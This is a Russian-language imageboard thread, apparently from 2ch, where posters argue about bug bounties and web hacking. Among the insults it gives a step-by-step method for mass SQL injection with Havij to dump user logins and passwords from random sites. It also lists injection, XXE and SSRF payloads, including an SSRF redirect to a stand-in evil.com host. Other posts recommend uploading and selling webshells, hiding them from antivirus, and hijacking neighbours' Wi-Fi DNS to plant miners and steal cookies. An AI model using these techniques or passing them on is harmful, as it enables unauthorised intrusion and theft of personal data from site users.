Тут не надо никакой кармы, просто факт такой что этот ваш багхантинг это нестабильное опасное занятие для молодых (потом уже не можешь столько аутировать). Так что или ты ведёшься себя хорошо, строишь связи, отношения, и к 30-ку ты можешь уже руководить чем-то, или ты пожил быстро, умер молодым. От голода или сторчания.
>опасное
Да с чего ты взял то?
Тебя наоборот с распростертыми объятиями встречают, и говорят, найди баг а мы заплатим денюжку, лол. Ты не уловил сути, короче, если так думаешь.
Все, теперь точно съебал.
Я - нет, кто-то да. Я склонен думать, что если ты улучшаешь по мере возможности среду обитания, от это выигрывают все, в первую очередь ты.
Карма в моем случае - это просто красивое слово, которое можно использовать как эвфемизм для этой концепции.
Бля забыл обьяснить самое главное. Уяхвимость позволяет попасть в базу данных сайта, где хранятся почты логины пароли и прочее. Часто пароли зашифрованные но часто нет.
После виыкания кавычки вывалилась ошибка или пропал контент - суйте ссылку без кавычки в хачвидж жмите старт и далее он вам все покпжет. Если баг есть выведет имя базы, далее выберете ее галочкой вытащите таблицы(tables) , далее если будет users/customers и прочее выберайте и вытаскивайте столбцы (columns) там уже вы увидете id login password и прочее, выбираете нужное вам и жмете get data. Запускайте несколько хавежей и хуярьте несколько сайтов сразу. Не вышло - следующий. За 10 минут таким банальным способом 3-4 сайта точно ломаются. Удачи, кому помог не ленитесь кидайте в тред свои находки, спрашивайте советов пока мы тут
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '11''' at line 1
Нашел на 10 стр гугла сайт, добавил '
Я хакир?
Да ты хакир, без шуток читай чо делать дальше вот тут
>хачвидж
>хавежей
блять, ты сам понимаешь что пишешь, нет? даже гугл не понимает о чем ты тут говоришь, даун блять
С мамашей свой так разговаривая псина деревянная. Тредом ошибся. Тут хеки одептов делают. Доебался до того как я пишу? Гугл не понимает? Для даунов есть ссылка на скачивание, там есть название на английском.
Я в этой теме больше лет, чем ты умеешь говорить, еблан блять. Не позорься, животное ебаное.
Ну давай пенсионер блиц опрос или ты пиздабол?
ну попробуй чмоша
Как через инклуд прочитать содержимое PHP файла?
ТЫ ПРО ПОХАПЭ, еблан?
фича в mysql позволяющая прочитать файл если file_priv=N ?
load_file какой-то?
что за пиздец, то пхп, то блять супер криво настроенные сервера, чо несешь даун?
эх, как же прияно дать на клык скрипткиду.
тест провален,продолжать нет смысла. Теперь я тебе разрешаю назвать свой носок женским именем засунуть в него свой хуй, разбудить мамку и показать ей как ты класно умеешь.
ответ на первый вопрос:
php://filter/convert.base64-encode/resource=%file.php%
Ответ на второй:
LOAD DATA LOCAL INFILE '%file%' INTO TABLE test FIELDS TERMINATED BY '\n'
Всего хорошего сладенький. Рассказывай теперь своим друзьям какой ты хакер тут ты уже зашкварился.
Феликс, аватарку забыл одеть.
Гормоны сегодня принял?
>php://filter/convert.base64-encode/resource=%file.php%
Как там в 2011?
>LOAD DATA LOCAL INFILE '%file%' INTO TABLE test FIELDS TERMINATED BY '\n'
>Я СКОЗАЛ load_file НЕ КАТИТ ТОЛЬКО КАК Я НАПИШУ
Ясно, скрипткид.
Как там metasploit, норм настроил?
Додс load_file не работает если file_priv=N
О чем мне с тобой дальше разговаривать? Ты сейчас попытался реабилитироваться, назвал меня скрипткидом, упомянул метасплоит, хорошо хоть это знаешь. Зашкварился повторно. Спокойной ночи анончики. Пусть вам приснятся дампы гигабайтные и шеллы траффистые.
блять, так и вижу как даун пишет админу "дяденька, у меня хакерские штуки, которые я на хакер.ру не работают,Ю вы можете php.ini настроить? а? что? у вас не php, а как у вас сайт арботает? .net? что"
>Додс load_file не работает если file_priv=N
>О чем мне с тобой дальше разговаривать?
>Мне нехую сказать, поэтому я напишу, что я шарю а ты нет без пруфов, вот
Уебывай и говно свое забери, скрипткид.
>Ты сейчас попытался реабилитироваться, назвал меня скрипткидом
Ну да, это ты накидал тут список говноПО тому шо ТЫ ХАКИР вот такой, без говноПО никуда, а я пытаюсь реабилитироваться, ага.
щенок блять
расскажи за труПО
мимоанон
Конченый я накидал мануал как начать с этим говно по (и указал лично что это зуита) и увидеть профит не влипая сутками в мануалы и документацию. Также если ты конченый вырубишь свою выборочную слепоту ты увидишь что я написал что можно начать с этого а потом почитать статью и научится крутить руками. Линк и пруфы выше. Всех благ. Надеюсь это у тебя излечимо.
ну или свою позицию изложи. было бы интересно
Дык сразу набежали бы, мол
>кококо рекламареклама репооорт
или ты пиздабол?
Помойму тут все ясно, свиду это типичная прыщеблядь. Изза упоминания дотнэта делаю вывод что это разраб на .net а не хацкер. Противоречащие выводы, но всёже.
Да нахуй мне скрипткиду что-то пояснять? Ты же кроме программ и пару протухших 2009 блять год этой хуйни!!!мануалов нихуя не знаешь.
Слит, диванный.
Ясно.
Понятно.
Иди гугли как там сервера на php 5.2 ломать, будь на острие, как говорится.
Нахуй ты мне отвечаешь?
Семен, плис.
ок го по свежаку пробежимся! Просто думал такое старое гавно (ну тоесть классику на самом деле) все знают.
Как эксплуатировать XXE когда WAF реагирует на SYSTEM?
Как посылать POST запросы через SSRF во внутреннюю сеть?
Как эксплуатировать mysql инъекцию в лимит после oрдер бай?
Как эксплуатировать XXE когда WAF реагирует на SYSTEM?
Как посылать POST запросы через SSRF во внутреннюю сеть?
Как эксплуатировать mysql инъекцию в лимит после oрдер бай?
Под кроватью Семена не нашел, шизик?
> топовый_вуз
МФТN???????????????
>свежаку
>XXE
>свежаку
>POST запросы через SSRF
>свежаку
>mysql инъекцию в лимит после oрдер бай
>свежаку
Что еще спизданешь?
Вот серьезно, я просто проорал сейчас. Это просто пиздец блять. Ты сайты вида "васян_пердун_2006" ХАКИЕШЬ, ХАЦКОР?
Поверь в этой сфере 30к платят только стажерам на пол ставки.
блять, такой норм был тред про баунти, пока скрипткид со своим говном не прибежал.
Ты сука наглядный пример деградации веб-защиты(блять, слово вылетело из головы,но ты понял).
Слишком толсто.
Может сам хоть что-нибудь спизданешь или ты всего лишь врунишка?
РАУНД!
Ну давай оправдывайся. Слушаю.
Мб хоть чтото из этого пердуновского (дай бог 14г) знаешь?
или
<!DOCTYPE {0xdfbf} SYSTEM
Веб защиты хахахаха. Дядя я в офенсиве(если ты понимаешь о чем я) уже не первый год. А твои термины "веб защита" похожи на кафедру програмистов в шараге.
Отвектор артсплоита, но нет. Я имел ваиду public))
>Как эксплуатировать mysql инъекцию в лимит после oрдер бай?
Через PROCEDURE ANALYSE
Ахуенно.
Доебался до слов. Причем я даже написал, что слово из головы вылетело.
Я не знаю, где ты там первый год, но я более чем уверен, что вместо изучения технологий ты читаешь статейки античата.
Блять, да ты же скрипткид, что ты мне втираешь блять?
К слову, я людей с античата еще году в 2006 в хакерском закрытом канале в ирце нахуй послал, тк уебки ниначто не способные, такие же как ты, там были изначально.
И еще, если ты знаешь пару старинных вещей и пытаешься этим кого-то подловить, тк подобного дохуя и больше - то ты просто уебок. Это тебе таК, на будущее.
>Как посылать POST запросы через SSRF во внутреннюю сеть?
А это хуй знает, обычно для подтверждения баги хватает обычный векторов. Но просвяти.
Годный тред
мимоцтфник
Был годным, пока скрипткид не пришел и не обосрался на весь тред.
Верно!
Смотри в сторону gopher://
Напиши уже хоть что-нибудь, что могло бы запруфать твою "профессиональность", а то выглядишь пустословом. И не надо кукарекать про то, что "доказывать что-то чушкам с двоща" тебе лень.
Он наверно имеет ввиду компьютерную программу. То что у тебя на пикче - типичнейшая дыра, наверно дохуя софта, которая может в поиск такой уязвимости, не? То есть ручками работать не надо будет, запустил программу на ночь, а утром уже посмотрел результаты.
Какая тима если не секрет?
> То есть ручками работать не надо будет, запустил программу на ночь, а утром уже посмотрел результаты.
Блять, и тебя он заразил.
Есть скрипта, в одном флаги точеные, в другом флаги дроченые. Куда фаззить пойдешь, куда реверсить?
Большая и сильная
топ 5 цтфтайм
Чем тебе пруфать?
Или мне тоже спросить какую-то паблик хуйню, которая гуглится за 2 секунды? Или про "уязвимость" 10 летней давности спросить, про которую ты слышать не слышал, тк осталась она только на серверах Васянов?
Бро да он уже трижды слит, пусть кукарекает. Аноны сами видят кто лев толстой...
найс самоподсос.
Все популярные ресурсы проверены на дыры вдоль и поперёк кучей желающих, вероятность найти хоть что-то крайне мала, не?
Не.
99% - скрипткиды, которые сканят фейсбуки всякой псевдо-хакерской парашей.
Куча всего есть.
Даже аноны с харкача бабло с ВК получали, например, причем относительно недавно.
Эй, хакеры, а вы пизду хоть раз вживую видели?
Идешь на hackerone.com в раздел hacktivity и видишь, что каждый день выплачивают кучу денег за репорты на самых популярных сайтах.
Я по стеганографии и крипте вообще
Неткат врубаешь и фаззиш порты. Мне так думается, не разу не встречал. Про днс да верно чекаю бурповским колаборатором сначала наличие запрсиков от бажной приложухи а потом пытаюсь читать файлы.
Ftp:// по каефу позволяет читать директории в java есть тулзень для этого поднимает сервачок и логирует все. Сорян скинуть не могу не помню как называется
Да, когда твоя мать свою раздолбанную мандень на вебку крутила.
Так тут успешные же все. Все 20+, состоятельные, даже если задроты, то денег на шлюху точно хватит.
По вебке это не вживую, даун девственник.
Ты хакаешь сервак, когда у тебя к нему полный доступ есть, да?
Кробабасы подъехали фаззить буду там где не задрочено авось чо и нафаззею а там где заточено позову кореша реверсить ято кавычкодав и скрипткиддес (мне так сказали)
А кто сказал, что по вебке смотрел?
>на вебку крутила.
Предлагаю на ночном завтра этот тред пересозать и померяться писюнами, надеюсь скрипткид не будет кукарекать снова, показывая он ебантяй и не рассмешит уважаемых людей.
Не знаниея бородатых паблик фишек, а рили достижениями.
друг это слишком толсто, ну как ты не поймешь?
Что толсто, еблан? Ты никакой свой вклад в сообщество показать не сможешь? Хотя бы 1 раз денежек за хакцорство получал?
Но я то рядом стоял.
А чем меряться то? Успешными репортами? Так я вот предполагаю, что ты типа из какого-нибудь ptsecurity, у тебя по любому и опыта больше и репортов, если это ты про офенсив говорил, я же самоучка например, и звезд с неба не хватаю, но гуглить и изучать что-то новое, чтобы проэксплуатировать при случае, смогу.
да получал. Деанонится не буду тут мои коллеги могут почитывать. Ах да, я ежемесячно получаю за это, ну за последние 3 месяца вышло где 2кк
Хактивити - это же не только хакеруан или подобные площадки. Можно и что-нить другое показать.
Мне вот интересно достижения других людей посмотреть.
поверь, он не оттуда)))
yarbabin, залогиньтесь.
Там эту древнюю хуйню(выше) на собеседовании спрашивают уххахахаххах
Типикал скрипткид.
Когда-нибудь, может быть, ты поймешь, что главное это не заучить старинную парашу, а понимать как/что работает.
Это отличает меня от тебя.
а как что работает?
Ну вот ты выше заученные вопросы задавал, на которые ты знаешь заученные ответы.
Но если тебя спросят "почему" - ты же обосрешься, ничего кроме "нуу эээ нуу" сказать не сможешь.
он работает за копейки и несет хуйню, я зарабатываю шесть-семь его годовых окладов и пытаюсь понять нахуй он ее несет
>он работает за копейки и несет хуйню
ТЫ скозал?
Бля жду вопрос
Жопой читаешь? Выше были вопросы/ответы. А объяснить сами процессы скрипткид не может, зато пытается доказать на анонимной доске, что он тут получает больше всех, знать не зная чужие доходы.
Ну сколько щас провинциальные кодеры на дотнете получают 500-600$ в месяц?
зато он меняет пароль раз в три месяца, и в нем есть цифры и спецсимволы.
Выбирай любой из вопросов я обьясню
Я думал ты чтото от себя сможешь сказать ну тыже хакер, олдфаг ебать. В 6ом школоту смачата в irc щемил
Такто я вайтбокс тоже могу(если ты понимаешь о чем я) тыже хакер
>Ну сколько щас провинциальные кодеры на дотнете получают 500-600$ в месяц?
Куда мне до таких высот. Я работяга обычный.
>дотнет
>сам придумал, сам раздувает
>скрипткид пиздабол
>классика
Вопросы будут или тебе помочь сформулировать?
Ебануться. Это тред с петухами 300к/сек
Ты клея обпыхался чтоли? Какие нахуй вопросы ? Вопросы/ответы были у скрипткида, я ему заметил, что полезно не заучивать вопросы/ответ, а полезно знать саму суть процессов/технологий, что и как работает, что из чего следует, почему происходит одно, а не другое. Понимание сути лучше, чем заученная хуйня.
Вот как думаешь, скрипткид знает, что такое модель OSI и нахуй её вообще знать? Вот где нужно начинать, а не с перечня программ уровня xspider(или как там назывался МЕГА СКАНЕР УЯЗВИОМСТЕЙ)
не с петухами, а со специалистами в области информационной безопасности.
Тред хорош.
Пол года назад хотел вкатится в хаккерство.
Хотел ставить на рандом вай-фай днс пересылку, на сайт с заражением системы на майнинг или просто пиздить инфу(куки, пароли и тд).
Ходишь по городу с ноутом(или малиной, хотел её взять, чтоб сразу сломать если запалят), ломаешь вайфай с помощью брута(можно пересылать хэнды на комп с мощной видяхой, что я и хотел сделать), ну а дальше днс ставить и все
Короче вопрос у вас, это было все реально сделать? А то я только коплю на малину, а ноут большой и громоздкий.
Пол года назад хотел вкатится в хаккерство.
Хотел ставить на рандом вай-фай днс пересылку, на сайт с заражением системы на майнинг или просто пиздить инфу(куки, пароли и тд).
Ходишь по городу с ноутом(или малиной, хотел её взять, чтоб сразу сломать если запалят), ломаешь вайфай с помощью брута(можно пересылать хэнды на комп с мощной видяхой, что я и хотел сделать), ну а дальше днс ставить и все
Короче вопрос у вас, это было все реально сделать? А то я только коплю на малину, а ноут большой и громоздкий.
а какое отношение модель osi имеет к реально существующему интернету.
Братан модель оси и ее ебаные уровни нахуй не нужны в веб хакинге, яж говорил это не твой тред. Я тебе могу разжевать за любой баг в вебе про сети плз создай отдельный тред. И там вспоминай метасплоит и xspider(который умер в нулевых кстати)
Побойся бога, тут же белые шляпы онли.
Если ты хацкор уровня вставить кавычку, то никакой.
>Я тебе могу разжевать за любой баг в вебе
Ну ясно.
Ну по городу не стоит, долби соседей подрубайся к вайфаю, тыкай их роутеры(часто дефолтные пароли или вообще ничего). В них можно свой днс пихать в настройках.
Это не секундное дело чтоб по городу ходить, придется оселать постоянно.
Врядли кто спалит. На вопрос со делаешь скажи игру для телефона пишу. Поугорают и кйдут
А ты мне за модель оси разжевать решил ну это ебать по хакерски!
В шараге наверно заебали с ней да? В жизни то хоть пригодилось?
>И там вспоминай метасплоит и xspider(который умер в нулевых кстати)
Нахуй ты кстати мне мои же слова, адресованные скрипткиду, повторяешь?
а какой твой любимый плагин к ida?
Очень интересный тред, ОП. Я сам баловался, с sql инъекцмями, но это лет 8 назад было, сейчас они уже не особо актуальны.
А кто еще, кроме гугла и фейсбука практикует выплаты за найденные уязвимсоти? Как вообще происходит общение после того, как она найдена? Куда выплачивают? Нужно ли платить налог россии?
>А ты мне за модель оси разжевать решил ну это ебать по хакерски!
Ты либо обиженка-скрипткид, либо просто жопой читаешь. Перечитай еще раз пост, где я упоминал модель.
Соседей на изи. Даже без брута. У них стандарт пароли типа "12345678", "password" и тд.
Ну если засунуть малину в рюкзак, с припаяной батарейкой, чтобы часа 4 держала заряд, то можно и спокойно стоять и курить, пока ловятся хэши.
Скрипт и мегамозг, который все баги всех систем знает спать ушли. Вместе.
Я вставляю кавычку, это портит синтаксис sql запроса (если там инъекция), изза того что юзеринпут не фильтруется должным образом. В зависимости от субд, типа запроса и места моего внедрения в запрос можно будет крутить эту инъекцию разными способами. А модель оси тут куда приписать? Точто яп обращается к базе данных по ее протоколу, сервер базы данных принимает сообщение на физический уровень и оно передается выше? Нахуй это тут?
Я понял ты решил уже хоть чтото спиздануть под конец не в попад. Поздравляю это твоя первая победа.
>Я вставляю кавычку, это портит синтаксис sql запроса
Ты таким образом мог Васянов в 2006 ломать, но не проекты с хакеруаныв 2017. Уебывай.
А модель была мной озвучена как пример того, что нужно изучать процессы, а не заучивать мертвые баги старинных систем.
ЩАс же мамкины хакеры побегут качать сик'юэль инджекшн, и половят дохуя вирусняков.
Или же сломают винду установкой кали.
Или же сломают винду установкой кали.
Я хспайдер и метасплоит привел в пример скрипткиду, чтобы напомнить ему, что он скрипткид, то есть не человек, а животное, которое нихуя не понимает, просто берет непонятную ему парашу и использует её.
Нахуй ты встрял в разговор, если не понимаешь о чем шла речь - непонятно. То есть либо ты как раз тот скрипткид, который обиделся и поэтому орет, что знать нихуя не нужно, либо ты просто долбоеб, который как раз-таки сам спизданул не в попад.
ну а что ж ему, самому 0day сидеть искать.
Как тебе угодно, петух
бля какойже ты ущербный даун. Ты вообще не понимаешь что ты несешь.
https://hackerone.com/reports/23098
https://hackerone.com/reports/12583
https://hackerone.com/reports/115748
Да таких багов нет на х1. Только у васянов. Скинул бы свои репорты но деанонится изза какогото окологика нищеброда втирающего про модель оси в треде про хакинг не хочу.
https://hackerone.com/reports/23098
https://hackerone.com/reports/12583
https://hackerone.com/reports/115748
Да таких багов нет на х1. Только у васянов. Скинул бы свои репорты но деанонится изза какогото окологика нищеброда втирающего про модель оси в треде про хакинг не хочу.
Ну а почему бы нет?
Ты же
>Я тебе могу разжевать за любой баг в вебе
К вопросу о том, откуда берутся баги. Наверняка эта форма в письме не валидировала входящие данные.
Это только звучит круто. Найти дело 5 минут другое дело что продукт будет малоизвестный.
Мамин какер сдеанонился за 10 постов, лол.
>привел в пример сайты Васянов
Ясно.
>Скинул бы свои репорты
Блять, ору.
БЫ БЫ БЫ БЫ БЫ БЫ
ты случаем не пекафэт? видел их переписку по хакеруану, он особенно часто выдавал подобные перлы как и ты "блять, я бы показал сколько я нашел багов, да деанонится боюсь, но блять верьте на слово я суперхакир, имею по 300к/сек без пруфов"
Всего хорошего. Обмажься моделью оси и своей бумажкой из шараги. Про носок не забудь. Ахда напомню
С чего все началось ты сказал что ты хакер и в теме пиздец давно но не знаешь основ(это старая хуета). Оказалось что ты пиздабол. Кодер, учился в шараге (в вузе). Скорее всего пишешь на .нет . Ничего толком дельного сказать не смог только кидался говном. Я то увернулся но ты сам измазался пока кидался. Былаб это не анонимная борда над тобой бы еще долго потешались.
Честно мне похуй веришь ты или нет.
Знатоки, дайте совет пожалуйста
Учусь сейчас на погромиста в европке. Первый курс. Через пол года надо выбирать специализацию и ее дрочить еще три года, на выбор есть:
Software Engineering
Smart Systems
Mobile Solutions
IoT and Cloud Computing
Что бы вы порекомендовали?
Алсо, что бы по быстрому вкатиться в айти сферу и все таки начать зарабатывать деньги, начал учить андроид дев. Все правильно делаю?
спасибо
Учусь сейчас на погромиста в европке. Первый курс. Через пол года надо выбирать специализацию и ее дрочить еще три года, на выбор есть:
Software Engineering
Smart Systems
Mobile Solutions
IoT and Cloud Computing
Что бы вы порекомендовали?
Алсо, что бы по быстрому вкатиться в айти сферу и все таки начать зарабатывать деньги, начал учить андроид дев. Все правильно делаю?
спасибо
ты б хоть программу курсов почитал.
>Всего хорошего
>Ой, всё
Ясно.
>деньги
копейки
похапэ - проще вкатиться и ваканский больше.
Мне кажется, что идет уже переполнение этих андроид специалистов. + это нахуй не нужно.
4 по мне интересно, что сейчас все интернет вещи набирают оборот + стартап сможешь замутить какой нить. Типа умный носок работающий на твоем поте, и конектится к твоему смартфону и показывает насколько воняет твой носок, чтоб кинуть той шкуре в лицо.
Самому тоже надо делать выбор, но учусь в рашке. Думаю таки на ИБ. Погромист хуже пидораса. или червя-пидора, но это php-шники
Скрипткиддисы, когда находится время на поиск багов? После работы? Или с мамками живете и вам работать не нужно? Или только поиск багов? А вдруг нихуя не найдете, как платить за жилье и прочее?
Спасибо, поцоны.
Думаете стоит забросить ведро и начать пхп?
А то я аж целую неделю учусь, могу и бросить
Лол, проиграл с репортов, особенного первого, как imgur развели на 2к, указал ещё Remote Code Execution, высер с гопхером который БОЖЕЖ ТЫ МОЖЕТ ПОДКЛЮЧИТСЯ К SMTP и ОТПРАВИТЬ ПИСЬМО, больше половины хакероне состоит из убеждений вендора в КРИТИЧНОСТИ РЕПОРТА, всякими теоретическими высерами.
просто ты жадный.
заблуждение. Там не дауны сидят и принимают баги. Их задача заплатить тебе минимально, не нарушая правил программы. Бывает что они сами обьясняют критичность
>заблуждение
только кукарекнуть можешь или противопоставишь что-либо тексту, скрипткид?
Ну в пхп вкатиться гораздо проще, и ваканский в разы(в сотни раз даже наверное) больше, а дальше - думай сам. А если сравнивать уже сеньеоров - то может андроид и выйграет, то опять же вакансия нужна, скилы. Да и нахуй тебе это задротство, когда ты сеньеором станешь, не в 23 же года.
Конкретно в данном случае вендора развели теоретикой, и практикой которая на 100 баксов тянет, и напугами вбросив пару CVE - а как они реализуются эти CVE уже ума не надо - главное убедить и напугать.
Вот если бы реализовал, хотябы на примере POC'а не добивая до конца RCE - тогда и заслуга.
ОколоХССных даунов там больше половины, а специалистов которые реализовывают сложные векторы добивая по типу с порнхабом - единицы.
>ОколоХССных
Ты сейчас скрипткидов и кавычкадавов треда обосрал низахуй. Знания специалистов для чуханов. Нормальный скрипткид знает 3 старых бага и 2 старых тактики.
Неправильно, куда-то бы там не вкатывался, дрочи кресты.
Раз уж здесь весь цвет ptsecurity собрался, объясните на пальцах, как burp collaborator отлавливает dns запросы. Или как вообще сделать dns запрос и отловить на своей стороне при ssrf.
То есть я не силен в ssrf, но могу реализовать при случае так.
Допустим есть уязвимый урл http://lol.com?url=
Я делаю так http://lol.com?url=http://evil.com/ssrf.php, где evil.com контролирую, ессно, я а ssrf.php cодержит что-то типа <?php header("Location: http://мой_сервак:12345/"); ?>
Ну и смотрю логи.
А как сделать/отловить dns запрос?
То есть я не силен в ssrf, но могу реализовать при случае так.
Допустим есть уязвимый урл http://lol.com?url=
Я делаю так http://lol.com?url=http://evil.com/ssrf.php, где evil.com контролирую, ессно, я а ssrf.php cодержит что-то типа <?php header("Location: http://мой_сервак:12345/"); ?>
Ну и смотрю логи.
А как сделать/отловить dns запрос?
Не совсем тебя понял, если раскрыть DNS, https://thesprawl.org/projects/dnschef/
скрипткид дальше кавычкодавста да запуска протухшего ПО не могет.
Если 2ой выебщик нихуя не напишет, а он не напишет, потому что выебщик, то я тебе чуть попозже распишу.
Ну вот, смотри, недавни нашумевший баг.
https://habrahabr.ru/post/319676/
>Ок. Это действительно случается довольно часто, когда компания блокирует обычные http-запросы, но не блокирует запросы DNS. Что ж, попробуем другой пэйлоад:
Там все мне понятно кроме одного, как именно чувак обошел dns-запросом фаервол и отловил его на своей стороне? Что для этого нужно, кроме самого сервака, который ведет логи таких запросов.
Алсо, спасибо за ссылку, интересная штука. Завтра(уже сегодня) внимательно изучу.
Спасибо за тред, ОП. Ты - молодец, мало кто будет делиться такой инфой, вроде бы она и не приватная, но вот так разжевывать все для анона - просто подарок, который больше половины треда здесь не оценят.
Воннаби войтохед в треде. По молодости очень хотел вкатиться в реверсинг, какие-то простые кряки даже получались, редактировал ресурсы, менял OEP, обходил блоки проверки регистрации... только вот уже все почти забыл нахрен, да и инструменты те, наверное, уже устарели. Юзал HVIEW - ломаный/реганый подгонял старший товарищ (настоящий профи, знаменит на сцене), да и все остальные тулзы тоже он давал, не учил только особо, говорил всегда - учи АСМ, там разберешься. Ах да, протекторы худо-бедно снимал. Сейчас уже, наверное, не смогу восстановил ни одну таблицу импорта.
Максим?
С удовольствием прочитаю, если распишешь, только прочитаю уже завтра, лол, засыпаю пиздец. Заранее спасибо за разъяснения.
а в чем заключается конкретно эта уязвимость на яндексе?
Нет, не Максим.
Лол, я Максим который подходит под описание
Нашел баг в интерфейсе гугла
@
Дали $10к
@
Нашел орфографическую ошибку на сайте касперского
@
Дали 10 лет в колонии поселения и штраф $10к
@
Дали $10к
@
Нашел орфографическую ошибку на сайте касперского
@
Дали 10 лет в колонии поселения и штраф $10к
С русскими связываться не стал бы. Те скорее на сгуху отправят, чем денег заплатят.
которая подруга Боба?
Фейсбук, Гугл - а кто еще заплатит, если найдешь багу? Например, нашел дырку на сайте какой-нибудь фирмы забугорной, у которой само собой нет никаких программ поиска багов, это просто корпоративный сайт. Никто ж не заплатит за такое. Надо вести будет переговоры с начальством фирмы?
>Никто ж не заплатит за такое.
продай в даркнете
Да, и скорее всего тебя пошлют на хуй.
Очень много ушлых.
Я как-то нашел баг в одной известной российской сети. Позвонил, админ попросил показать, я показал, админ отследил и закрыл багу, меня послали на хуй.
С забугорными тоже самое, всем похуй на баги.
Самое простое и прибыльное - заливать шеллы и продавать.
что означает "заливать шелл"?
мимо-даун
Ну есть сайт pisya.ru, ты, хацкор, заливаешь файл туда pisya.ru/images/file.php
Открыв эту ссылку, ты увидишь что-то типо пикрила.
Покупатель по итогу сможешь заливать какие-то свои файлы(или править их файлы, вставляя рекламу порнухи, н-р) и тд
->
Какие сейчас шеллы в ходу? Я раньше c99 заливал.
wso
антивирусы ща палят все за нехуй делать, мне кажется проще что-то свое небольшое напсать.
Хуй, надо уметь просто
Ну если ты правишь шелл - то это тоже самое, что самому писать. А так - др. веб, н-р, все шеллы палит известные.
Закриптованные там в base64 хотябы тоже палятся?
Банально ксорнуть а код получать с пастбина
Я стеганографически прятал
Ну я что пробовал - всё палил, там понятное дело всё шифровали.
Ну это тоже заебись придумал, может и прокатит такое.
А если я околовебдев, стоит ли вкатываться в такое?
Да и с современным вебом - такое уже слабо катит, нет?
И как вообще вкатиться?
Да и с современным вебом - такое уже слабо катит, нет?
И как вообще вкатиться?
Телеграм/KrobaKingdom
P.A.S
>Бумажным безопасникам, которые ололо составляют "матрицы угроз", ковыряются в ГОСТах, чтобы написать очередную должностную инструкцию, которая нахуй никому не нужна и остальное время устанавливающие антивирусы на рабочих местах
Собираюсь стать именно таким безопасником. Какие подводные камни?
Тебе будут ссать на лицо практические безопасники.
Да и похуй как-то.
Деньги неплохиено не 5к$/баг, конечно, работа - не бей лежачего большую часть времени.
Ну бля, такой тред проспал...
Не сливайте баги на хакерван.
Не сливайте баги на хакерван.
тебе можно писать на [email protected]?
Нужно знать языки программирования? А если я ноль вообще, но люблю втыкать и искать всякие дыры (в играх например)?
>Черные шляпы првиетствуются
В МЕСТЕ МЫ СИЛА
>если я ноль вообще
Не пиши. При шеллкодировании сплоента надо избегуть нолей, ибо они терминируют asciiz строку.
>Юзал HVIEW
>протекторы худо-бедно снимал
А дворды в уме ксорил?
inurlbr, епта, хавидж блять..
Для тренировки пойдет. у и понтануться в школе можно.
>2017
>Искать скули по доркам
>Да ещё и юзая Havij
Ебал я твой hackerone, ОП. Ебал в рот и в жопу. Там бывает так, что у программы нуль репортов, а твой баг всё равно объявят уже найденым. В пизду. Сажи вайтхетам.
Получилось!
Пойду забирать бабло.
Пойду забирать бабло.
ап
еще работает, епта, давайте набигайте в Телеграм конфочка @KrobaKingdom
>Телеграм
лол
могу ли я за ета денги получить
Всегда радуют коментарии подтянувшихся теоретиков. Годный тред в череде рулеток и вебмок, я далек от тематики но почитать интересно. Спасибо ОП
Лол, ебучая лента на харкаче контент фармит.
wut?
Кто не с нами - тот под нами
Кроба
Кроба
Ты все некак не уймешся? Крутой поцан по кличке жопа? Ахуенный хакер спиздил хуй и спрятал в жопе? Что ты сделал для тредика? Что ты сделал для того чтоб одептам было интересно? Лох гавно и не пацан, ору с тебя
А.У.Е. братишка, кробословляю тебя на кробоугодную деятельность! Во имя святой кавычки и скобки! Кробминь! @KrobaKingdom
Может есть уютная конфочка для уютных хакерманов?
@KrobaKingdom
А сервер какой? jabber.ru?
Телеграм, ёпт.
ето телеграф конфа! у Telegram есть веб версия (еси чо она ни на тор, ни на впн не ругается)
Открываю ленту, а там
https://lenta.ru/news/2017/01/20/thankshacker/
Лол, открываю харкач а тут это (где-то в треде упоминался этот случай)
Так ссылку дай.
@KrobaKingdom в поиске телеграма набери
Ты шутишь что ли?
>Please choose your country and enter your full phone number.
Может еще скан паспорта приложаит, а, майор?
Major Laser одобряе. На sms-reg.ru купи акк или симку друга\брата\мамки возьми, ну чо ты
Я хекал в 2006-м, недавно попробовал - это пиздец.
Хуй что найдёшь, везде всё анально экранировано, даже если есть где-то, то какой-нибудь блайнд.
Баги выглядят очень легко НУ ОЧЕВИДНО ЖЕ БЫЛО ТУДА ПОДСТАВИТЬ скрипт.алерт , но стоит самому сесть искать - это какая-то бездонная пропасть - можно просто двое суток сидеть и НИЧЕГО не найти. Всё везде надёжно экранировано.
Как быть, что делать-то?
Не всё безнадёжно экранировано. Помимо инъекций, хсс - есть ещё уйма уязвимостей и с каждым днём их становится всё больше и больше.
Схороните тред. Буду становиться успешным человеком. Завтра.
Вот смотри оп, или чуваки с иб конфочек. Если я буду натравливать [bold]ACUNETIX[/bold], мне дадут пиздюлей или все норм, т.к. участвует сайт в багбаунти?
Тоже подумал об этом.
Лол.
Админ там унылый пидор, он даже те баги, которые я ему бесплатно палил, не фиксил.
Хз, попытай удачу мб.
>купи акк
На что только не готовы долбоебы, лишь бы жаббером не пользоваться.
>Хуй что найдёшь, везде всё анально экранировано, даже если есть где-то, то какой-нибудь блайнд.
Не надо пиздеть.
За эту неделю слил базу магазина и сайта знакомств c проститутками через sql-inj.
Как защищаешься в процессе? Соксы, впны, еще что?
Ответьте мне на мой вопрос
И за блайнды или досчерезХХЕ грошей же не дадут?
И за блайнды или досчерезХХЕ грошей же не дадут?
впн+тор вполне хватает
>за блайнды или досчерезХХЕ грошей же не дадут?
Вот за это дадут. Блайндом и ХХЕ можно увести базу как два пальца.
> за это дадут. Блайндом и ХХЕ можно увести базу как два пал
Бля, сурьезна за блайнд заплотють? таймбэйсд или похуй какой?
А вот если именно дос по ХХЕ? И что по поводу акунетиксов или ларрилау(а то вдруг чо пропущу), не взбугуртят о сканере?
Эти сканнеры юзает каждый мамкин-багхантер (ну или бурп). Все инъекции входят в топ owasp 10 и являются критичными. Посему заплатят.
Если конечно место, где ты нашёл, входит в скоуп.
У меня был заказ. Нужно было ломать какие-то уже взломанные друпалы.Протыкал все ебучие модули, все паблик эксплоиты протыкал, нихуя не вышло. Причём там ошибка должна была быть уровня получения админки, ибо нужно было в сам код вписать ссылку.
Из 30 сайтов - я не нашёл НИХУЯ. Подумал, что или их ломали взломав их хостинг, или они сами продавали ссылки таким образом.
Раньше как-то получалось. Находил и в модулях разных уязвимости, и XSS скармливал, и потом рутал.
Или я отупел, или хуй знает.
Какие-то уязвимости совсем другие сейчас. Что почитать можно?
сидели бы эти все долбаебы в жаббере, телеграм бы был нинужын.
